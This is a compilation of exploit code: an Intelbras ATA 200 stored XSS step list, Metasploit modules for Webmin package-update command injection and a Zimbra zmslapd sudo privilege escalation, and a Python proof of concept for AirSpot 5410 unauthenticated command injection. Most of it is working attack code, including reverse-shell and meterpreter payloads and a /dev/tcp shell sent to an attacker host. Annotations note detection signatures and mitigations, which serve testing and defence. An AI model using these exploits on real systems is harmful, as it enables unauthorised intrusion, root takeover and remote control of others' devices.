<pre><code># Exploit Title: Intelbras ATA 200 Authenticated Stored XSS<br /># Date: 17/01/2022<br /># Exploit Author: Leonardo Goncalves<br /># Vendor Homepage: https://www.intelbras.com/pt-br/adaptador-ip-para-telefones-analogicos-ata-200<br /># Version: Firmware 74.19.10.21<br /><br />1) Log in to the equipment via your web browser<br />2) Go to Management > Syslog<br />3) In the "Server Address" field, inject the payload "-prompt("XSS")-"<br />4) Click Save<br />5) Exploit<br /></code></pre>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Authenticated command injection in Webmin's Software Package Updates
# module (CVE-2022-36446; the description below states it is fixed in 1.997).
# The surface this module exercises is a POST to package-updates/update.cgi
# whose `u` field carries shell metacharacters that are concatenated into the
# package-manager call. From a detection standpoint, a request to that URI
# with `;`, `$(` or `&&` inside `u` is a high-fidelity signature in the
# server's request logs (hence IOC_IN_LOGS below); the dropper targets also
# leave a staged binary on disk (ARTIFACTS_ON_DISK). Mitigation is to update
# past 1.997 and to limit which accounts are granted the Package Updates module.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options. RPORT/SSL default to Webmin's usual 10000/TLS;
  # `/` is declared a bad char, which is why execute_command rewrites it.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Webmin Package Updates RCE',
        'Description' => %q{
          This module exploits an arbitrary command injection in Webmin
          versions prior to 1.997.

          Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform
          package updates and installation. Due to a lack of input
          sanitization, it is possibe to inject arbitrary command that will be
          concatenated to the package manager call.

          This exploit requires authentication and the account must have access
          to the Software Package Updates module.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Christophe De La Fuente', # MSF module
          'Emir Polat' # Discovery and PoC
        ],
        'References' => [
          [ 'EDB', '50998' ],
          [ 'URL', 'https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165'],
          [ 'CVE', '2022-36446']
        ],
        'DisclosureDate' => '2022-07-26',
        'Platform' => ['unix', 'linux'],
        'Privileged' => true,
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64],
        'Payload' => { 'BadChars' => '/' },
        'DefaultOptions' => {
          'RPORT' => 10000,
          'SSL' => true
        },
        'Targets' => [
          [
            'Unix In-Memory',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
            }
          ],
          [
            'Linux Dropper (x86 & x64)',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux Dropper (ARM64)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_AARCH64,
              'Type' => :linux_dropper,
              'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path to Webmin', '/']),
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', '123456'])
      ]
    )
  end

  # Version-based check: reads `Server: MiniServ/<version>` from an
  # unauthenticated GET on the base path and reports Appears only below 1.997.
  # A body containing the "running in SSL mode" notice means the request hit
  # a TLS-only listener over plain HTTP, so the result is Unknown, not Safe.
  # Returns a CheckCode; connection errors are mapped to Unknown.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )

    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res

    if res.body.include?('This web server is running in SSL mode.')
      return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")
    end

    version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first

    return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version

    version = Rex::Version.new(version)

    vprint_status("Webmin #{version} detected")

    unless version < Rex::Version.new('1.997')
      return CheckCode::Safe("#{peer} - Webmin #{version} is not a supported target")
    end

    vprint_good("Webmin #{version} is a supported target")

    CheckCode::Appears
  rescue ::Rex::ConnectionError
    return CheckCode::Unknown("#{peer} - Could not connect to web service")
  end

  # Authenticates against session_login.cgi with USERNAME/PASSWORD. A 302 is
  # treated as success and the returned cookies are retained
  # ('keep_cookies' => true) for the later request. The `testing=1` cookie
  # presumably satisfies a cookie-support probe in the login handler — confirm.
  # Raises via fail_with on no response or a non-302 status.
  def do_login
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/session_login.cgi'),
      'headers' => { 'Referer' => full_uri },
      'cookie' => 'testing=1',
      'keep_cookies' => true,
      'vars_post' => {
        'user' => datastore['USERNAME'],
        'pass' => datastore['PASSWORD']
      }
    })

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res
    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302

    print_good('Logged in!')
  end

  # Sends one command through the update.cgi `u` field. The signature
  # (cmd, opts) is the callback shape CmdStager's execute_cmdstager expects.
  # Because `/` is a bad char for this module, every `/` in the payload is
  # replaced by `${SEP}`, and SEP is defined inline by having perl
  # base64-decode 'Lw==' (a single `/`). Single quotes are rewritten to double
  # quotes, presumably because `'` is consumed by the surrounding quoting — confirm.
  # The leading random token only provides something for the `;` to follow.
  # Note for detection: the literal `SEP=$(perl -MMIME::Base64` fragment in
  # the `u` field is unique to this module's traffic.
  def execute_command(cmd, _opts = {})
    cmd = cmd.gsub('/', '${SEP}').gsub('\'', '"')
    cmd = "#{rand_text_alphanumeric(4)};SEP=$(perl -MMIME::Base64 -e \"print decode_base64('Lw==')\")&&#{cmd}"

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/package-updates/update.cgi'),
      'headers' => { 'Referer' => full_uri },
      'vars_post' => {
        'mode' => 'new',
        'search' => rand_text(10),
        'redir' => '',
        'redirdesc' => '',
        'u' => cmd,
        'confirm' => 'Install Now'
      }
    })
  end

  # Logs in, then either injects the encoded command payload directly
  # (:unix_memory) or hands control to the CmdStager, which drives
  # execute_command to stage and run a dropped binary (:linux_dropper).
  def exploit
    print_status('Attempting login')
    do_login

    print_status('Sending payload')
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation through Zimbra's sudo rule for zmslapd
# (CVE-2022-37393). The rule that `check` looks for —
# "(root) NOPASSWD: <ZIMBRA_BASE>/libexec/zmslapd" — allows arbitrary
# arguments, and `-f <config>` makes zmslapd load a `moduleload` .so from a
# caller-chosen `modulepath` as root.
# Host-side indicators this module produces: a hidden directory under
# WritableDir (default /tmp) holding a dot-prefixed .so and a two-line
# config file, plus a sudo log entry for zmslapd run with `-u root -g root -f`
# pointing into that directory. Mitigation presumably means restricting the
# sudo rule to fixed arguments or a fixed config path — confirm against the
# vendor fix.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::Linux::Kernel
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options. SUDO_PATH and ZIMBRA_BASE are used by
  # `check`; WritableDir is where `exploit` stages its files.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zimbra zmslapd arbitrary module load',
        'Description' => %q{
          This module exploits CVE-2022-37393, which is a vulnerability in
          Zimbra's sudo configuration that permits the zimbra user to execute
          the zmslapd binary as root with arbitrary parameters. As part of its
          intended functionality, zmslapd can load a user-defined configuration
          file, which includes plugins in the form of .so files, which also
          execute as root.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Darren Martyn', # discovery and poc
          'Ron Bowes', # Module
        ],
        'DisclosureDate' => '2021-10-27',
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Privileged' => true,
        'References' => [
          [ 'CVE', '2022-37393' ],
          [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],
        ],
        'Targets' => [
          [ 'Auto', {} ],
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
      )
    )
    register_options [
      OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),
      OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]),
    ]
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Because this isn't patched, I can't say with 100% certainty that this will
  # detect a future patch (it depends on how they patch it)
  #
  # Preconditions verified here: not already root, the zmslapd binary exists
  # under ZIMBRA_BASE, sudo is on the path, and `sudo -n -l` lists the
  # NOPASSWD rule for zmslapd. Returns CheckCode::Safe on any failed
  # precondition, CheckCode::Appears otherwise.
  def check
    # Sanity check
    if is_root?
      fail_with(Failure::None, 'Session already has root privileges')
    end

    unless file_exist?("#{datastore['ZIMBRA_BASE']}/libexec/zmslapd")
      print_error("zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)")
      return CheckCode::Safe
    end

    unless command_exists?(datastore['SUDO_PATH'])
      # NOTE(review): the registered option is 'SUDO_PATH'; 'SUDOPATH' is not a
      # key set above, so this message likely interpolates nil (prints blank).
      print_error("Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)")
      return CheckCode::Safe
    end

    # Run `sudo -n -l` to make sure we have access to the target command
    cmd = "#{datastore['SUDO_PATH']} -n -l"
    print_status "Executing: #{cmd}"
    output = cmd_exec(cmd).to_s

    # `!output` can never be true after `.to_s`; the string checks that
    # follow are what actually decide this branch.
    if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')
      print_error('Current user could not execute sudo -l')
      return CheckCode::Safe
    end

    if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd")
      print_error('Current user does not have access to run zmslapd')
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  # Stages a hidden directory under WritableDir containing a config file
  # (`modulepath`/`moduleload`) and a shared object from generate_payload_dll,
  # then runs zmslapd through sudo with `-f` pointing at that config so the
  # module is loaded as root. The directory is registered with FileDropper for
  # cleanup; whether that also removes the files inside is up to FileDropper
  # and is not visible here.
  def exploit
    base_dir = datastore['WritableDir'].to_s
    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    # Generate a random directory
    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    if file_exist?(exploit_dir)
      fail_with(Failure::BadConfig, 'Exploit dir already exists')
    end

    # Create the directory and get ready to remove it
    print_status("Creating exploit directory: #{exploit_dir}")
    mkdir(exploit_dir)
    register_dir_for_cleanup(exploit_dir)

    # Generate some filenames
    library_name = ".#{rand_text_alphanumeric(5..10)}.so"
    library_path = "#{exploit_dir}/#{library_name}"
    config_name = ".#{rand_text_alphanumeric(5..10)}"
    config_path = "#{exploit_dir}/#{config_name}"

    # Create the .conf file
    config = "modulepath #{exploit_dir}\nmoduleload #{library_name}\n"
    write_file(config_path, config)

    # generate_payload_dll comes from Msf::Exploit::EXE; presumably it yields
    # an ELF shared object for the session's arch here — confirm.
    write_file(library_path, generate_payload_dll)

    # NOTE(review): this hard-codes `sudo` rather than datastore['SUDO_PATH'],
    # unlike `check` above.
    cmd = "sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}"
    print_status "Attempting to trigger payload: #{cmd}"
    out = cmd_exec(cmd)

    unless session_created?
      print_error("Failed to create session! Cmd output = #{out}")
    end
  end
end
# -*- coding: utf-8 -*-

# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

"""PoC for CVE-2022-36267: unauthenticated command injection in the AirSpot
5410 web interface.

Injection point, as used below: the ``targetIP`` field of the
``pingDiagnostic`` command posted to ``/cgi-bin/diagnostics.cgi``. The
field value is sent verbatim (``data`` is a pre-encoded string, not a dict)
with a backtick command substitution appended to the IP. For detection, a
POST to that CGI whose ``targetIP`` contains backticks (``%60``) or
``/dev/tcp`` is the signature; the request is unauthenticated, so no
session context accompanies it.
"""

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
    # ANSI-coloured banner. The function returns print()'s result, i.e. None.
    airspanLogo = """ 
 ,-.
 / \ `. __..-,O
 : \ --''_..-'.'
 | . .-' `. '.
 : . .`.'
 \ `. / ..
 \ `. ' .
 `, `. \
 ,|,`. `-.\
 '.|| ``-...__..-`
 | | Airspan 
 |__| AirSpot 5410
 /||\ PWNED x_x
 //||\\
 // || \\
 __//__||__\\__
'--------------'Necrum Security Labs
 
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m 
 FOR EDUCATIONAL PURPOSE ONLY. 
 """
    return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

def pingWebInterface(RHOST, RPORT):
    # Reachability probe: one GET on https://RHOST:RPORT with TLS verification
    # disabled (verify=False) and a 30 s timeout. Anything other than a 200
    # terminates the script via exit().
    #
    # NOTE: exit() raises SystemExit *inside* the try, and the bare `except:`
    # below catches it too, so a non-200 prints the error message twice before
    # exiting. The bare except also swallows KeyboardInterrupt and every other
    # exception into the same "not reachable" message.
    url = 'https://{}:{}'.format(RHOST, RPORT)
    try:
        response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
        if response.status_code != 200:
            print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
            exit()
        print('[INFO] Airspan device web interface seems reachable!')
    except:
        print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
        exit()


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
    # Builds the pingDiagnostic request with a percent-encoded, backtick-wrapped
    # `sh -i` reverse shell (over /dev/tcp to LHOST:LPORT) appended to the
    # targetIP value, and posts it without authentication. The HTTP response
    # is not inspected, so "successfully executed" only means the POST did not
    # raise. Returns None on that path and False from the except branch.
    #
    # NOTE: in the except branch `.format(...)` is applied to print()'s return
    # value (None), which raises AttributeError, so the failure message is
    # never formatted and `e` is unused.
    payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
    data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
    try:
        print('[INFO] Executing reverse shell...')
        response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
        print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
        return
    except Exception as e:
        print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
        return False

def main():
    # Entry point. `parser` is a module global created only inside the
    # __main__ guard below, so calling main() from an import raises NameError.
    banner()
    args = parser.parse_args()
    pingWebInterface(args.RHOST, args.RPORT)
    execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
    # add_help=False: there is no -h/--help; all four options are required.
    parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
    parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
    parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
    parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
    parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
    main()